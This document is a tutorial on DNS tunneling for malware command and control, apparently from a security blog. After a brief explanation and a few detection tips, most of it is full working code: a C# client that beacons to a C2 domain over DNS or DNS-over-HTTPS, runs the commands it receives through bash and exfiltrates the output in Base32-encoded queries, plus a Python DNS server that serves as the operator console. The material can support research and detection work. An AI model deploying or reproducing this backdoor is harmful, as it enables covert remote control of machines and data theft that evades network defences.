The Domain Name System (DNS) is used to resolve hostnames to their associated IP addresses. DNS can be used as a transport mechanism for malware Command & Control (C2) messages. This is useful if an environment has a restrictive web proxy that makes connecting outbound via HTTP difficult.
The concept of DNS tunneling is simple. An attacker configures nameserver records to point to their C2 server. For instance, they could configure an NS record for c2.malware.com, so that any host querying subdomains such as subdomain.c2.malware.com are redirected to this host.
In a corporate environment, typically a client makes a DNS request to an internal DNS server that will in turn query root servers if the system unable to answer the query itself. The DNS client will not directly connect to the attackers server.
Data from the client to the DNS server can be encoded within the A name record. For example, a client could make a request to test1.c2.malware.com, which the server can read to determine the client’s ID is test1. The server can acknowledge this query by encoding data in the IP address returned. For instance, using ASCII encoding, the server could return the letters “wait” by responding with the IP address 119.97.105.116.
To upload larger amounts from the client to the server, data can be Base32 encoded. Base32 is a suitable encoding mechanism since it doesn’t use characters which are restricted in domain names.
DNS tunneling is not restricted to A name records. Other records such as AAAA or TXT can also be used and potentially offer more space for encoded messages therefore increasing traffic throughput.
When a client communicates with a server, each request needs to be unique to prevent intermediary DNS servers from caching the responses.
DNS Record Configuration
The below DNS records are configured using Godaddy’s DNS manager.
Type | Name | Value | TTL |
A | NS1 | 1.1.1.1 | 900 |
NS | C2 | ns1.mydomain.com | 900 |
Any DNS request for subdomain.c2.mydomain.com will be forwarded to the IP address of our C2 server (1.1.1.1).
DNS Over HTTPS (DoH)
DoH is a way of performing DNS lookups over a HTTPS connection.
Cloudflare provide documentation on how to perform these requests. Using DOH has a couple of benefits from an attackers perspective;
- Traffic is encrypted by default. Unless HTTPS inspection is being performed, network analytics systems will not be able to interrogate the traffic.
- The client network will only see connections to the DOH server infrastructure, masking the real destination of the traffic.
DNS Tunneling Detection
There are a number of things defenders can do in relation to DNS tunneling;
- Sinkhole known malicious DNS domains.
- Perform DNS frequency analysis. Most SIEM system provide use cases to trigger based on large increases in DNS requests from a host.
- Most DNS C2 clients rely on Base32 or similar encoding mechanisms. This results in domain lookups that feature long domains with several numbers in them. This is unusual behavior, and again can be alerted on.
- Block direct outbound DNS connections at a firewall level. DNS traffic should only be allowed to leave the organisation from internal DNS servers.
Creating a Proof of Concept Client
Below is a .NET 6 C# client for macOS. The client uses A name records for encoding data, and performs requests either using DNS or DOH.
A Python DNS server is provided. The server does not directly support DOH, although the DOH service used by the client (in this case Cloudflare) will relay standard DNS requests to it.
C# Client Code
using System.Diagnostics;
using System.Net;
using System.Text;
using DnsClient;
using System.Net.Http.Headers;
using Newtonsoft.Json;
using Newtonsoft.Json.Linq;
public static class c2client
{
//Config variables
static String C2Server = ".test.bordergate.co.uk";
// Client poll time in milliseconds
static int C2delay = 2000;
// Placeholder ClientID (will be randomly generated)
static String ClientID = "XXXXX";
// Use Cloudflare DNS over HTTPS
static int UseDOH = 1;
private static Random random = new Random();
public static string RandomString(int length)
{
const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
return new string(Enumerable.Repeat(chars, length)
.Select(s => s[random.Next(s.Length)]).ToArray());
}
public static string DecodeCommand(string address)
//Convert IP address returned by server to ASCII
{
String result = "error";
try
{
string[] octets = address.Split('.');
result = "";
foreach (var octet in octets)
{
int unicode = Convert.ToInt32(octet);
char character = (char)unicode;
string text = character.ToString();
result += text;
}
}
catch
{
Console.WriteLine("Error splitting string: " + address);
}
return result;
}
public static string DOHLookup(string domain)
// Performs lookup using Cloudflare DOH
{
String ipv4 = "";
try
{
string apiEndpoint = "https://1.1.1.1/dns-query?name=";
using (var client = new HttpClient())
{
client.DefaultRequestHeaders
.Accept
.Add(new MediaTypeWithQualityHeaderValue("application/dns-json"));
var response = client.GetAsync(apiEndpoint + domain).GetAwaiter().GetResult();
if (response.IsSuccessStatusCode)
{
var responseContent = response.Content;
string results = responseContent.ReadAsStringAsync().GetAwaiter().GetResult();
Console.WriteLine(results);
dynamic dynObj = JsonConvert.DeserializeObject(results);
foreach (var answer in dynObj.Answer)
{
ipv4 = answer.data;
}
}
}
}
catch
{
Console.WriteLine("DOH lookup failed");
}
return ipv4;
}
public static string IPLookup(String domain)
//Resolve a domain to IP address
{
string ip = "";
if (UseDOH == 1)
{
ip = DOHLookup(domain);
}
else {
var client = new LookupClient(
new LookupClientOptions(NameServer.GooglePublicDns)
{
UseCache = false,
EnableAuditTrail = false,
Retries = 10,
Timeout = TimeSpan.FromSeconds(20),
ThrowDnsErrors = false
});
foreach (var aRecord in client.Query(domain, QueryType.A).Answers.ARecords())
{
ip = aRecord.Address.ToString();
}
}
return ip;
}
public static void GetCommands()
// make a DNS request with a 5 character client ID, and 5 character random value (to prevent caching issues)
{
String ClientID = RandomString(5).ToString();
String CommandBuffer = "";
while (true)
{
String request = ClientID + RandomString(5).ToString() + C2Server;
String address = IPLookup(request);
if (address == "")
{
Console.WriteLine("DNS Lookup failed: " + request);
Console.WriteLine("Sleeping 10 seconds...");
System.Threading.Thread.Sleep(10000);
}
else
{
String command = DecodeCommand(address.ToString());
Console.WriteLine(DateTime.Now.ToString("THH:mm:ss") + " Server:" + command);
if (command == "wait")
{
// do nothing
}
else if (command == "::::")
{
// :::: signifys command should be executed
Console.WriteLine(DateTime.Now.ToString("THH: mm:ss") + " Running command: '" + CommandBuffer + "'");
UploadResults(ExecCommand(CommandBuffer.Trim()));
CommandBuffer = "";
}
else
{
CommandBuffer += command;
}
}
System.Threading.Thread.Sleep(C2delay);
}
}
public static string ExecCommand(String command)
// Execute a command
{
try
{
Process p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.FileName = "bash";
p.StartInfo.Arguments = " -c \"" + command + "\"";
p.Start();
string output = p.StandardOutput.ReadToEnd();
p.WaitForExit();
Console.Write(output);
return output;
}
catch {
Console.WriteLine("Error running command");
return "Error running command: '" + command + "'";
}
}
public static string UploadResults(String results)
// Send results back to the server by encoding data in 30 byte A name lookups.
{
IEnumerable<string> chunks = results.Split(30);
foreach (string chunk in chunks)
{
if (chunk.Length != 30)
{
Console.WriteLine("Padding small chunk: " + chunk.Length);
String paddedchunk = chunk.PadRight(30, '^');
String Base32Encoded = DNSC2.Base32Encoding.ToString(Encoding.ASCII.GetBytes(paddedchunk));
Console.WriteLine(Base32Encoded);
IPLookup(ClientID + Base32Encoded + C2Server);
}
else
{
String Base32Encoded = DNSC2.Base32Encoding.ToString(Encoding.ASCII.GetBytes(chunk));
Console.WriteLine(Base32Encoded);
IPLookup(ClientID + Base32Encoded + C2Server);
}
}
return "";
}
public static void Main()
{
GetCommands();
}
}
public static class Extensions
{
public static IEnumerable<string> Split(this string str, int n)
{
if (String.IsNullOrEmpty(str) || n < 1)
{
//throw new ArgumentException();
}
for (int i = 0; i < str.Length; i += n)
{
yield return str.Substring(i, Math.Min(n, str.Length - i));
}
}
}
Client Base32 Encoding Library
using System;
namespace DNSC2
{
public static class Base32Encoding
{
public static byte[] ToBytes(string input)
{
if (string.IsNullOrEmpty(input))
{
throw new ArgumentNullException("input");
}
input = input.TrimEnd('='); //remove padding characters
int byteCount = input.Length * 5 / 8; //this must be TRUNCATED
byte[] returnArray = new byte[byteCount];
byte curByte = 0, bitsRemaining = 8;
int mask = 0, arrayIndex = 0;
foreach (char c in input)
{
int cValue = CharToValue(c);
if (bitsRemaining > 5)
{
mask = cValue << (bitsRemaining - 5);
curByte = (byte)(curByte | mask);
bitsRemaining -= 5;
}
else
{
mask = cValue >> (5 - bitsRemaining);
curByte = (byte)(curByte | mask);
returnArray[arrayIndex++] = curByte;
curByte = (byte)(cValue << (3 + bitsRemaining));
bitsRemaining += 3;
}
}
//if we didn't end with a full byte
if (arrayIndex != byteCount)
{
returnArray[arrayIndex] = curByte;
}
return returnArray;
}
public static string ToString(byte[] input)
{
if (input == null || input.Length == 0)
{
throw new ArgumentNullException("input");
}
int charCount = (int)Math.Ceiling(input.Length / 5d) * 8;
char[] returnArray = new char[charCount];
byte nextChar = 0, bitsRemaining = 5;
int arrayIndex = 0;
foreach (byte b in input)
{
nextChar = (byte)(nextChar | (b >> (8 - bitsRemaining)));
returnArray[arrayIndex++] = ValueToChar(nextChar);
if (bitsRemaining < 4)
{
nextChar = (byte)((b >> (3 - bitsRemaining)) & 31);
returnArray[arrayIndex++] = ValueToChar(nextChar);
bitsRemaining += 5;
}
bitsRemaining -= 3;
nextChar = (byte)((b << bitsRemaining) & 31);
}
//if we didn't end with a full char
if (arrayIndex != charCount)
{
returnArray[arrayIndex++] = ValueToChar(nextChar);
while (arrayIndex != charCount) returnArray[arrayIndex++] = '='; //padding
}
return new string(returnArray);
}
private static int CharToValue(char c)
{
int value = (int)c;
//65-90 == uppercase letters
if (value < 91 && value > 64)
{
return value - 65;
}
//50-55 == numbers 2-7
if (value < 56 && value > 49)
{
return value - 24;
}
//97-122 == lowercase letters
if (value < 123 && value > 96)
{
return value - 97;
}
throw new ArgumentException("Character is not a Base32 character.", "c");
}
private static char ValueToChar(byte b)
{
if (b < 26)
{
return (char)(b + 65);
}
if (b < 32)
{
return (char)(b + 24);
}
throw new ArgumentException("Byte is not a value Base32 value.", "b");
}
}
}
Python Server Code
#!/usr/bin/env python
import argparse
import datetime
import sys
import time
import threading
import traceback
import socketserver
import struct
from dnslib import *
import logging
clientdict = {}
commandlist = []
clientid = ''
activeclient = ""
class DomainName(str):
def __getattr__(self, item):
return DomainName(item + '.' + self)
D = DomainName('')
IP = '1.1.1.1'
TTL = 1 * 5
soa_record = SOA(
mname=D.ns1, # primary name server
rname=D.test, # email of the domain administrator
times=(
201307231, # serial number
60 * 60 * 1, # refresh
60 * 60 * 3, # retry
60 * 60 * 24, # expire
60 * 60 * 1, # minimum
)
)
ns_records = [NS(D.ns1), NS(D.ns2)]
records = {}
def encodecommand(raw_command):
#Take a part of a command and encode it in an IP address
responsearray = ['032','032','032','032']
i = 0
for letter in raw_command:
responsearray[i] = ord(letter)
i += 1
result = ""
for octet in responsearray:
result += str(octet) + "."
return result[:-1]
def c2logic(qn):
#Check the domain requested. Supply commands back to client.
global commandlist
global clientid
global clientdict
global activeclient
requestarray = qn.split(".")
clientid = requestarray[0]
clientid = clientid[:5]
if clientid not in clientdict:
print("new connection from: " + clientid)
dt = datetime.datetime.now()
clientdict[clientid] = str(dt)
if (len(clientid) == 5) and (clientid == activeclient):
if len(commandlist) != 0:
logging.info("SERVER RESPONSE")
logging.info(commandlist)
logging.info(commandlist[0])
response = commandlist[0]
del commandlist[0]
else:
response = encodecommand("wait")
else:
logging.info("WAITING")
response = encodecommand("wait")
return response
return response
def dns_response(data):
request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
qtype = request.q.qtype
qt = QTYPE[qtype]
D = qn
logging.info("CLIENT REQUEST: " + qn)
command = qn.split('.')[0]
# If the request is 10 characters long, it's a beacon id requesting a command
if len(command) == 10:
IP = c2logic(qn)
if IP == '58.58.58.58':
commandlist.clear()
records = { D: [A(IP), AAAA((0,) * 16), soa_record]}
for name, rrs in records.items():
if name == qn:
for rdata in rrs:
rqt = rdata.__class__.__name__
if qt in ['*', rqt]:
reply.add_answer(RR(rname=qname, rtype=getattr(QTYPE, rqt), rclass=1, ttl=TTL, rdata=rdata))
for rdata in ns_records:
reply.add_ar(RR(rname=D, rtype=QTYPE.NS, rclass=1, ttl=TTL, rdata=rdata))
reply.add_auth(RR(rname=D, rtype=QTYPE.SOA, rclass=1, ttl=TTL, rdata=soa_record))
else:
# If not a command, it's a response from the client
logging.info("CLIENT RESPONSE " + command)
command = command[5:]
logging.info("COMMAND " + command)
decoded = base64.b32decode(bytearray(command, 'ascii')).decode('utf-8')
logging.info(decoded)
#print(str(decoded),end = '')
print(str(decoded).replace('^',''), end = '')
IP = "9.9.9.9"
records = { D: [A(IP), AAAA((0,) * 16), soa_record]}
for name, rrs in records.items():
if name == qn:
for rdata in rrs:
rqt = rdata.__class__.__name__
if qt in ['*', rqt]:
reply.add_answer(RR(rname=qname, rtype=getattr(QTYPE, rqt), rclass=1, ttl=TTL, rdata=rdata))
for rdata in ns_records:
reply.add_ar(RR(rname=D, rtype=QTYPE.NS, rclass=1, ttl=TTL, rdata=rdata))
reply.add_auth(RR(rname=D, rtype=QTYPE.SOA, rclass=1, ttl=TTL, rdata=soa_record))
#print("---- Reply:\n", reply)
return reply.pack()
class BaseRequestHandler(socketserver.BaseRequestHandler):
def get_data(self):
raise NotImplementedError
def send_data(self, data):
raise NotImplementedError
def handle(self):
now = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f')
try:
data = self.get_data()
self.send_data(dns_response(data))
except Exception:
pass
class TCPRequestHandler(BaseRequestHandler):
def get_data(self):
data = self.request.recv(8192).strip()
sz = struct.unpack('>H', data[:2])[0]
if sz < len(data) - 2:
raise Exception("Wrong size of TCP packet")
elif sz > len(data) - 2:
raise Exception("Too big TCP packet")
return data[2:]
def send_data(self, data):
sz = struct.pack('>H', len(data))
return self.request.sendall(sz + data)
class UDPRequestHandler(BaseRequestHandler):
def get_data(self):
return self.request[0].strip()
def send_data(self, data):
return self.request[1].sendto(data, self.client_address)
def main():
global activeclient
parser = argparse.ArgumentParser(description='Start a DNS implemented in Python.')
parser = argparse.ArgumentParser(description='Start a DNS implemented in Python. Usually DNSs use UDP on port 53.')
parser.add_argument('--port', default=53, type=int, help='The port to listen on.')
parser.add_argument('--tcp', action='store_true', help='Listen to TCP connections.')
parser.add_argument('--udp', action='store_true', help='Listen to UDP datagrams.')
parser.add_argument('-d', action='store_true', help='Debug mode')
args = parser.parse_args()
print("Starting nameserver...")
args.udp = True
servers = []
if args.udp: servers.append(socketserver.ThreadingUDPServer(('', args.port), UDPRequestHandler))
if args.tcp: servers.append(socketserver.ThreadingTCPServer(('', args.port), TCPRequestHandler))
if args.d: logging.basicConfig(level=logging.INFO, format='%(asctime)s :: %(levelname)s :: %(message)s')
for s in servers:
thread = threading.Thread(target=s.serve_forever)
thread.daemon = True
thread.start()
print("%s server loop running in thread: %s" % (s.RequestHandlerClass.__name__[:3], thread.name))
try:
while 1:
#Take user input. Divide into 4 char chunks and encode. End with '::::'.
usercommand = input("\n" + clientid + ">")
if usercommand == "clients":
print(clientdict)
pass
elif usercommand.startswith("active"):
activeclient = usercommand.split(" ")[1]
print("active client: " + activeclient)
pass
else:
csize = 4
chunks = [usercommand[i:i+csize] for i in range(0, len(usercommand), csize)]
for chunk in chunks:
commandlist.append(encodecommand(chunk))
commandlist.append('58.58.58.58')
sys.stderr.flush()
sys.stdout.flush()
except KeyboardInterrupt:
pass
finally:
for s in servers:
s.shutdown()
if __name__ == '__main__':
main()